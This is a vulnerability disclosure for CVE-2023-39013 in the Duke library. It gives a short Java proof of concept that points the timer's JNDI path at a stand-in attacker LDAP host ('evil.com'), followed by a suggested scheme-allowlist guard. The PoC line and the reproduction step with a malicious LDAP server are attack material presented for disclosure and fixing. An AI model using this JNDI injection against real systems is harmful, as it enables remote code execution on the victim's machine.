CVE-2023-39013: There's a code injection vulnerability of `no.priv.garshol.duke.server.CommonJTimer.init` · Issue #273 · larsga/Duke

Duke v1.2 and below was discovered to contain a code injection vulnerability via the component no.priv.garshol.duke.server.CommonJTimer.init.


Affected Version
The latest version 1.2 and below.

Describe the vulnerability
no.priv.garshol.duke.server.CommonJTimer.init(Properties) is designed to initialize a timer. However, passing an unchecked argument to this API can lead to the execution of arbitrary code. For instance, the following code will lead to the execution of arbitrary code from attackers:

import java.util.Properties;
import no.priv.garshol.duke.server.CommonJTimer;

// Proof of concept from the report: the JNDI path is read from the property and looked up unchecked
CommonJTimer timer = new CommonJTimer();
Properties timerProperties = new Properties();
timerProperties.setProperty("duke.timer-jndipath", "ldap://evil.com:12345");
timer.init(timerProperties);

To Reproduce
Build an LDAP server and provide malicious code. Then simply executing the above code reproduces it.

Fix Suggestion
Filter LDAP, RMI and related protocols when using lookup.
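A defensive counterpart to the fix suggestion, added here as an example and not code from the Duke project: the hypothetical SafeJndiLookup class validates the value of duke.timer-jndipath against a scheme allowlist before handing it to InitialContext.lookup, so remote-loading schemes such as ldap:// and rmi:// are rejected up front. The property key comes from the report; the class name, the REMOTE_SCHEMES list and the sample local name java:comp/env/timer/TimerManager are assumptions.

```java
import java.util.Locale;
import java.util.Properties;
import java.util.Set;
import javax.naming.Context;
import javax.naming.InitialContext;
import javax.naming.NamingException;

/** Hypothetical guard (not part of Duke) that refuses non-local JNDI names before lookup. */
public final class SafeJndiLookup {

    // Schemes whose lookups can fetch object factories or classes from a remote server.
    private static final Set<String> REMOTE_SCHEMES = Set.of(
            "ldap", "ldaps", "rmi", "iiop", "iiopname", "corbaname", "dns", "nis", "nds", "http", "https");

    /** Accepts only names in the container-local "java:" namespace; everything else is rejected. */
    public static boolean isAllowedJndiPath(String path) {
        if (path == null) {
            return false;
        }
        String trimmed = path.trim();
        int colon = trimmed.indexOf(':');
        if (colon <= 0) {
            return false; // no explicit namespace: ambiguous, so refuse rather than guess
        }
        String scheme = trimmed.substring(0, colon).toLowerCase(Locale.ROOT);
        if (REMOTE_SCHEMES.contains(scheme)) {
            return false; // explicit deny for known remote-loading providers
        }
        return scheme.equals("java"); // allowlist: local namespace only
    }

    /** Reads duke.timer-jndipath, validates it, and only then performs the JNDI lookup. */
    public static Object lookupTimer(Properties props) throws NamingException {
        String path = props.getProperty("duke.timer-jndipath");
        if (!isAllowedJndiPath(path)) {
            throw new IllegalArgumentException("refusing non-local JNDI path: " + path);
        }
        Context ctx = new InitialContext();
        return ctx.lookup(path.trim());
    }

    public static void main(String[] args) {
        // Constructed inputs: the report's remote path is rejected, a local name is accepted.
        System.out.println(isAllowedJndiPath("ldap://evil.com:12345"));              // false
        System.out.println(isAllowedJndiPath("java:comp/env/timer/TimerManager"));   // true
    }
}
```

A production version would also log the rejected value so that an attempted remote lookup shows up in monitoring rather than failing silently.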

Related news

GHSA-p83q-99rc-vfmv: Code injection in Duke

